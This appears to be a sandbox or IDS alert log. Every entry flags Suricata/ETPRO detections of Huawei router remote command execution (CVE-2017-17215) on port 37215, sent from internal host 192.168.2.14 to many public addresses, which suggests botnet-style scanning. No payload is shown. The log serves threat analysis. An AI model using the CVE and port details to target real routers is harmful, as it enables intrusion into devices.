                                            06/14/24-10:43:37.763498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034037215192.168.2.14197.219.163.129
                                            06/14/24-10:44:04.411297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747437215192.168.2.14156.26.58.245
                                            06/14/24-10:43:54.201709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167237215192.168.2.14156.2.111.195
                                            06/14/24-10:44:12.614303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141237215192.168.2.1441.89.23.222
                                            06/14/24-10:44:08.520095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879037215192.168.2.14197.190.155.216
                                            06/14/24-10:44:22.860099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016437215192.168.2.1441.128.79.240
                                            06/14/24-10:44:02.381847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.1441.252.145.110
                                            06/14/24-10:44:16.715885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14156.61.18.67
                                            06/14/24-10:44:29.012961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133637215192.168.2.14197.84.46.51
                                            06/14/24-10:44:10.568080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300837215192.168.2.1441.153.21.193
                                            06/14/24-10:44:33.152358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381237215192.168.2.14156.147.180.77
                                            06/14/24-10:43:39.792859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218037215192.168.2.14156.42.57.150
                                            06/14/24-10:44:04.409924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384837215192.168.2.14197.98.102.95
                                            06/14/24-10:44:31.094290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199437215192.168.2.14197.58.122.75
                                            06/14/24-10:43:58.293504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885237215192.168.2.1441.103.45.135
                                            06/14/24-10:44:02.365403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844637215192.168.2.1441.165.91.60
                                            06/14/24-10:44:22.862158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941237215192.168.2.14197.169.175.11
                                            06/14/24-10:43:34.676161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675037215192.168.2.14197.163.24.189
                                            06/14/24-10:44:10.563158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216637215192.168.2.1441.128.68.122
                                            06/14/24-10:44:02.368293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942037215192.168.2.1441.153.63.226
                                            06/14/24-10:44:02.366562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968837215192.168.2.1441.182.9.240
                                            06/14/24-10:44:10.547103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711237215192.168.2.14156.17.133.92
                                            06/14/24-10:44:02.368657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740037215192.168.2.1441.253.113.117
                                            06/14/24-10:44:20.804781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5444237215192.168.2.14197.163.99.28
                                            06/14/24-10:43:45.992177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693437215192.168.2.14156.80.90.213
                                            06/14/24-10:43:39.813053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075637215192.168.2.14156.0.58.74
                                            06/14/24-10:44:29.014559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241237215192.168.2.14156.74.241.66
                                            06/14/24-10:43:56.243839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569037215192.168.2.14156.250.227.182
                                            06/14/24-10:44:16.735486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286837215192.168.2.1441.245.46.27
                                            06/14/24-10:44:18.766014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928837215192.168.2.14156.125.116.7
                                            06/14/24-10:43:34.677276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566437215192.168.2.14156.70.154.169
                                            06/14/24-10:44:10.563641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032837215192.168.2.1441.235.226.148
                                            06/14/24-10:43:45.967678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849437215192.168.2.14197.234.128.75
                                            06/14/24-10:44:35.182386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149637215192.168.2.14197.177.205.245
                                            06/14/24-10:43:39.811361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14156.223.13.28
                                            06/14/24-10:44:31.052072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947637215192.168.2.1441.36.135.77
                                            06/14/24-10:43:36.729792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.14156.188.62.145
                                            06/14/24-10:44:14.683103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465237215192.168.2.1441.240.20.236
                                            06/14/24-10:44:00.338717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703237215192.168.2.1441.106.140.15
                                            06/14/24-10:43:43.969177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947237215192.168.2.14197.193.26.48
                                            06/14/24-10:44:18.776406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293237215192.168.2.14156.150.113.187
                                            06/14/24-10:43:58.292162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574237215192.168.2.14156.13.115.33
                                            06/14/24-10:44:33.134521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989037215192.168.2.14197.21.2.221
                                            06/14/24-10:44:18.763816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621837215192.168.2.1441.55.170.249
                                            06/14/24-10:43:34.661762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578237215192.168.2.14197.172.100.117
                                            06/14/24-10:44:00.324683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071637215192.168.2.1441.4.190.191
                                            06/14/24-10:43:56.228566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797037215192.168.2.14197.236.90.134
                                            06/14/24-10:44:06.452498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.1441.139.68.250
                                            06/14/24-10:43:36.725755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786037215192.168.2.1441.185.44.230
                                            06/14/24-10:44:20.807392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297237215192.168.2.14156.196.160.52
                                            06/14/24-10:44:31.053004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519637215192.168.2.1441.237.107.73
                                            06/14/24-10:44:22.881857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471637215192.168.2.1441.179.192.240
                                            06/14/24-10:44:00.334682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430437215192.168.2.1441.183.227.125
                                            06/14/24-10:43:50.074042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432237215192.168.2.14197.199.221.135
                                            06/14/24-10:43:52.150342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942037215192.168.2.14156.245.93.27
                                            06/14/24-10:43:52.150974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998037215192.168.2.1441.0.226.123
                                            06/14/24-10:43:36.703869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493437215192.168.2.1441.225.231.84
                                            06/14/24-10:43:50.114018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281637215192.168.2.1441.181.72.169
                                            06/14/24-10:44:16.716269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784237215192.168.2.14156.208.117.157
                                            06/14/24-10:43:54.185843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969637215192.168.2.14156.185.20.167
                                            06/14/24-10:43:52.146071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496037215192.168.2.1441.152.70.65
                                            06/14/24-10:44:31.054404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222637215192.168.2.1441.10.51.123
                                            06/14/24-10:44:29.023711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978637215192.168.2.14197.252.167.187
                                            06/14/24-10:44:33.133267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612837215192.168.2.14156.244.80.83
                                            06/14/24-10:44:31.083796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970237215192.168.2.1441.187.230.190
                                            06/14/24-10:44:16.716667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060637215192.168.2.1441.218.34.51
                                            06/14/24-10:43:54.199081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062437215192.168.2.14156.32.102.31
                                            06/14/24-10:44:33.151337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559237215192.168.2.1441.7.225.184
                                            06/14/24-10:44:06.471148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044037215192.168.2.1441.181.100.174
                                            06/14/24-10:44:10.549174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144037215192.168.2.1441.179.195.110
                                            06/14/24-10:44:35.181306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749837215192.168.2.1441.29.143.146
                                            06/14/24-10:43:43.944606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934237215192.168.2.14197.205.224.159
                                            06/14/24-10:44:20.830298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552637215192.168.2.1441.254.144.159
                                            06/14/24-10:43:58.278071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474837215192.168.2.14197.36.254.242
                                            06/14/24-10:44:00.322841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343037215192.168.2.14197.13.31.79
                                            06/14/24-10:44:02.367914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349837215192.168.2.14197.222.121.237
                                            06/14/24-10:44:22.859219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689637215192.168.2.1441.229.136.70
                                            06/14/24-10:43:43.967660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14197.0.122.212
                                            06/14/24-10:44:20.803302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950437215192.168.2.14156.130.139.187
                                            06/14/24-10:43:58.294034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953037215192.168.2.14156.176.84.128
                                            06/14/24-10:44:12.617344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035237215192.168.2.14156.144.132.97
                                            06/14/24-10:44:26.977251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640237215192.168.2.14197.81.170.83
                                            06/14/24-10:43:34.661155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.1441.172.240.153
                                            06/14/24-10:43:52.145730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996237215192.168.2.14197.67.108.73
                                            06/14/24-10:43:54.183671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667237215192.168.2.14197.25.62.53
                                            06/14/24-10:44:12.625266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419637215192.168.2.14197.68.240.73
                                            06/14/24-10:44:04.410627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287437215192.168.2.1441.211.161.189
                                            06/14/24-10:44:24.913659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862437215192.168.2.14156.153.251.6
                                            06/14/24-10:43:37.760598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823237215192.168.2.14197.134.205.84
                                            06/14/24-10:43:50.112097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918037215192.168.2.1441.223.208.251
                                            06/14/24-10:44:14.684021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667037215192.168.2.14197.175.30.107
                                            06/14/24-10:43:36.726923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637837215192.168.2.1441.26.184.134
                                            06/14/24-10:44:33.152662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951837215192.168.2.14156.106.111.214
                                            06/14/24-10:44:12.618248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.1441.9.44.43
                                            06/14/24-10:43:34.676877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.14197.181.204.177
                                            06/14/24-10:43:56.253131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367637215192.168.2.14156.36.87.208
                                            06/14/24-10:44:29.012372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.1441.143.169.30
                                            06/14/24-10:43:34.663685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233237215192.168.2.14197.160.179.42
                                            06/14/24-10:44:08.519435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199637215192.168.2.14156.250.145.229
                                            06/14/24-10:44:12.614066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364837215192.168.2.14197.108.254.110
                                            06/14/24-10:44:16.733530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503637215192.168.2.14156.116.137.20
                                            06/14/24-10:44:04.421355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553637215192.168.2.14156.207.138.194
                                            06/14/24-10:44:10.544052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568437215192.168.2.1441.192.172.174
                                            06/14/24-10:44:33.133822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467037215192.168.2.14197.210.251.33
                                            06/14/24-10:44:10.544168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530837215192.168.2.1441.200.251.32
                                            06/14/24-10:44:12.643489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817637215192.168.2.14156.244.65.55
                                            06/14/24-10:44:18.776589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484237215192.168.2.14156.231.210.164
                                            06/14/24-10:44:18.777230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548637215192.168.2.14156.1.44.203
                                            06/14/24-10:44:18.779592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961437215192.168.2.1441.137.225.72
                                            06/14/24-10:43:37.772401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978437215192.168.2.14156.183.116.44
                                            06/14/24-10:43:48.028594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843437215192.168.2.14156.252.214.223
                                            06/14/24-10:44:24.943255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712837215192.168.2.1441.246.107.153
                                            06/14/24-10:43:48.028744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905437215192.168.2.14156.74.63.87
                                            06/14/24-10:44:14.669575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726437215192.168.2.14156.117.0.172
                                            06/14/24-10:44:00.321197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419237215192.168.2.14197.55.128.247
                                            06/14/24-10:43:58.293145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550837215192.168.2.14197.245.12.167
                                            06/14/24-10:44:16.736520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485837215192.168.2.14156.1.26.66
                                            06/14/24-10:44:04.421875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844637215192.168.2.14197.113.144.80
                                            06/14/24-10:44:20.807485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140437215192.168.2.14156.153.34.110
                                            06/14/24-10:44:02.368799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877837215192.168.2.14197.231.100.31
                                            06/14/24-10:44:20.805270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725037215192.168.2.14197.102.61.100
                                            06/14/24-10:44:16.717738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140037215192.168.2.14156.232.193.35
                                            06/14/24-10:44:24.915483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222437215192.168.2.1441.255.66.156
                                            06/14/24-10:44:31.052490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772437215192.168.2.14156.136.199.17
                                            06/14/24-10:44:33.149063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218837215192.168.2.1441.190.235.80
                                            06/14/24-10:44:10.548471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5423837215192.168.2.14197.120.139.100
                                            06/14/24-10:44:20.807655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008037215192.168.2.14156.163.143.182
                                            06/14/24-10:43:52.164847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344437215192.168.2.14197.67.80.64
                                            06/14/24-10:44:26.999297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14197.226.125.236
                                            06/14/24-10:44:14.689131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751037215192.168.2.1441.14.84.255
                                            06/14/24-10:44:16.718923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3276837215192.168.2.14156.209.99.140
                                            06/14/24-10:43:56.242572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530037215192.168.2.1441.17.196.149
                                            06/14/24-10:44:02.367670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016237215192.168.2.1441.1.209.178
                                            06/14/24-10:44:08.519069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011437215192.168.2.1441.148.161.45
                                            06/14/24-10:44:12.645739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328637215192.168.2.14197.65.80.44
                                            06/14/24-10:44:00.325705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348837215192.168.2.14197.66.224.32
                                            06/14/24-10:44:06.470383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040837215192.168.2.14156.59.25.206
                                            06/14/24-10:43:34.663363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651637215192.168.2.1441.75.213.161
                                            06/14/24-10:43:39.790177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742837215192.168.2.1441.119.137.77
                                            06/14/24-10:43:43.972329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944037215192.168.2.1441.250.110.6
                                            06/14/24-10:44:10.542550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424437215192.168.2.1441.125.147.201
                                            06/14/24-10:44:00.322983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150037215192.168.2.14156.219.97.18
                                            06/14/24-10:43:45.969296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358437215192.168.2.14156.109.134.1
                                            06/14/24-10:43:37.762373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206837215192.168.2.14197.74.56.98
                                            06/14/24-10:44:10.548851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404837215192.168.2.14156.209.181.112
                                            06/14/24-10:43:54.184294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854037215192.168.2.14197.11.133.111
                                            06/14/24-10:43:56.245432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105237215192.168.2.1441.77.177.177
                                            06/14/24-10:44:00.322943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489237215192.168.2.1441.162.226.83
                                            06/14/24-10:43:54.200625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402437215192.168.2.14197.81.146.233
                                            06/14/24-10:43:54.200312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636037215192.168.2.14156.188.103.110
                                            06/14/24-10:44:24.943937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002837215192.168.2.14197.217.249.152
                                            06/14/24-10:44:22.879619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833237215192.168.2.14156.212.77.150
                                            06/14/24-10:43:41.899151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483437215192.168.2.14156.220.39.142
                                            06/14/24-10:44:18.775594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347237215192.168.2.14197.193.145.20
                                            06/14/24-10:44:31.056414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708637215192.168.2.14197.82.147.200
                                            06/14/24-10:43:36.699175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740037215192.168.2.14197.235.203.125
                                            06/14/24-10:43:36.705504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679437215192.168.2.14197.78.103.253
                                            06/14/24-10:43:52.143418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109637215192.168.2.14197.241.110.216
                                            06/14/24-10:44:33.134139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419437215192.168.2.1441.148.209.71
                                            06/14/24-10:43:54.181765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566237215192.168.2.14156.234.26.120
                                            06/14/24-10:43:39.792475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191437215192.168.2.14156.228.153.200
                                            06/14/24-10:44:16.736475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350237215192.168.2.14156.23.8.33
                                            06/14/24-10:43:41.849164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.14197.132.132.236
                                            06/14/24-10:43:50.115571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458837215192.168.2.14197.70.22.3
                                            06/14/24-10:43:36.725141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600237215192.168.2.14156.179.188.118
                                            06/14/24-10:44:22.878032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427837215192.168.2.14197.224.22.35
                                            06/14/24-10:44:20.828057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.14197.137.249.249
                                            06/14/24-10:43:36.703727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713437215192.168.2.14156.236.153.67
                                            06/14/24-10:43:50.111857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814437215192.168.2.14197.79.180.239
                                            06/14/24-10:44:29.024051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717637215192.168.2.1441.98.123.152
                                            06/14/24-10:44:10.565486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846637215192.168.2.1441.82.6.30
                                            06/14/24-10:44:10.548606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598837215192.168.2.1441.36.156.119
                                            06/14/24-10:44:18.763424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264837215192.168.2.1441.82.28.47
                                            06/14/24-10:44:00.339516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.14156.98.22.125
                                            06/14/24-10:44:20.804618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307837215192.168.2.1441.71.209.7
                                            06/14/24-10:44:04.420964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711237215192.168.2.1441.100.23.128
                                            06/14/24-10:43:36.701279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093037215192.168.2.1441.129.100.45
                                            06/14/24-10:44:33.132529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.14156.31.103.89
                                            06/14/24-10:43:39.792224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654837215192.168.2.14156.95.217.92
                                            06/14/24-10:43:39.790792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366237215192.168.2.1441.244.186.25
                                            06/14/24-10:43:39.792960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773637215192.168.2.14156.216.100.222
                                            06/14/24-10:44:24.943372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968237215192.168.2.14197.63.138.82
                                            06/14/24-10:43:52.149329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.14197.166.106.201
                                            06/14/24-10:44:00.341180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970037215192.168.2.14156.99.241.153
                                            06/14/24-10:44:29.014955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602637215192.168.2.14156.253.139.230
                                            06/14/24-10:44:27.001487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.1441.66.25.182
                                            06/14/24-10:44:18.774863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089037215192.168.2.1441.91.197.212
                                            06/14/24-10:44:18.766418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977037215192.168.2.14197.103.181.235
                                            06/14/24-10:43:56.242939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599037215192.168.2.14197.26.55.175
